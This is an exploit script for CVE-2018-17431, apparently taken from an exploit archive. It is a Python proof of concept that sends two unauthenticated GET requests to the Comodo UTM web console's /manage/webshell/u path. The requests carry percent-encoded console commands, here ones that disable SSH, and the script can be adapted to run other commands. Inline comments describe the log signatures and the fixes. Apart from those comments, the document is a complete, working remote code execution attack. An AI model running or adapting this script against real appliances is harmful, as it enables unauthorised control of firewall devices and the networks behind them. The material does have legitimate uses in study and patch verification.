## https://sploitus.com/exploit?id=PACKETSTORM:159246
# Exploit Title: Comodo Unified Threat Management Web Console 2.7.0 - Remote Code Execution  
# Date: 2018-08-15  
# Exploit Author: Milad Fadavvi  
# Author's LinkedIn: https://www.linkedin.com/in/fadavvi/  
# Vendor Homepage: https://www.comodo.com/  
# Version: Releases before 2.7.0 & 1.5.0   
# Tested on: Windows=Firefox/chrome - Kali=firefox  
# PoC & other infos: https://github.com/Fadavvi/CVE-2018-17431-PoC  
# CVE : CVE-2018-17431  
# CVE details: https://nvd.nist.gov/vuln/detail/CVE-2018-17431
# CVSS 3 score: 9.8   
  
import requests  
  
def RndInt(Lenght):
    """Return a string of ``Lenght`` random decimal digits.

    The caller uses the result only as filler for the numeric query
    parameters (s, w, h, l, _) of the request URL; ``Lenght == 0`` yields
    an empty string.
    """
    import random
    import string

    picked = []
    for _ in range(Lenght):
        # One digit per iteration, drawn from "0123456789".
        picked.append(random.choice(string.digits))
    return ''.join(picked)
  
if __name__ == "__main__":
    # Proof of concept for CVE-2018-17431 (affected releases are listed in the
    # header). Read as a defender: the script issues two plain GET requests to
    # /manage/webshell/u and attaches no cookie, token or credential to either.
    # In web-server or proxy logs that appears as two hits on that path in
    # quick succession, the first with a long percent-encoded "k" value and the
    # second with k=%0a. Upgrading past the releases named in the header and
    # keeping the management console off untrusted networks are the
    # corresponding defensive actions.

    IP = input("IP: ")
    Port = input("Port: ")

    # Percent-encoded keystrokes carried in the "k" parameter. Decoded, this is
    # "service", "ssh", "disable", each followed by a newline (%0a).
    # For other commands the author points to the manual of the specific
    # Comodo UTM version and to the PoC repository
    # (https://github.com/Fadavvi/CVE-2018-17431-PoC).
    Command = '%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a' ## Disable SSH

    # Everything except "k" is random digit filler produced by RndInt.
    BaseURL = "https://" + IP + ":" + Port + "/manage/webshell/u?s=" + RndInt(1) + "&w=" + RndInt(3) +"&h=" + RndInt(2)
    LastPart = "&l=" + RndInt(2) +"&_=" + RndInt(13)
    CommandURL = BaseURL + "&k=" + Command + LastPart
    # Second URL: same filler values, but "k" holds a single newline.
    EnterURL = BaseURL + "&k=%0a" + LastPart

    try:
        FirstResponse = requests.get(CommandURL).text
    except:
        # Bare except kept as in the original: any exception raised by the
        # first request, not only an HTTP error, ends up with this message.
        print('\nExploit failed due HTTP Error. Check given URL and Port!\n')
        exit(1)

    # The second request is not wrapped in try/except; a failure here
    # propagates as an unhandled exception.
    SecondResponse = requests.get(EnterURL).text

    # The script treats this marker in the second response body as
    # confirmation that the appliance accepted the configuration change.
    if "Configuration has been altered" not in SecondResponse:
        print("\nExploit Failed!\n")
        exit(1)

    print("\nOK! Command Ran!\n")
    exit(0)